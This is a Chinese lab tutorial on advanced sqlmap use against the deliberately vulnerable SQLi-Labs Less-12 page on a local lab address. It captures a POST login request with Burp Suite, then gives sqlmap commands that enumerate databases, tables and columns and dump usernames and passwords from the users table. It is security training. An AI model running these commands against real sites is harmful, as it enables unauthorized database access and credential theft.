进阶使用"/>
SQLMAP进阶使用
实验原理
使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。
1.访问SQLi-Labs网站
访问Less-12
http://192.168.5.116/sqli-labs/Less-12/
2.利用Burpsuite工具抓包
1)启动Burpsuite并设置代理服务端口
2)设置Firefox代理
注意:端口要一致
3)开启 Burpsuite的代理拦截功能
4)利用Burpsuite工具拦截HTTP请求包
输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包
5)将请求包内容拷贝至D:\1.txt中
3.启动SQLMAP
进入sqlmap目录,在搜索框输入cmd,并回车
4.寻找注入点
python sqlmap.py -r D:\1.txt --technique "U" -v 3
其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。
检测结果
5.获取数据库的库名
1)获取所有数据库的库名
python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs
2)获取当前数据库的库名
python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db
6.获取security数据库中的所有表名
python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables
其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns
8.获取users表id,username和password字段的全部值
python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump
更多推荐
SQLMAP进阶使用
发布评论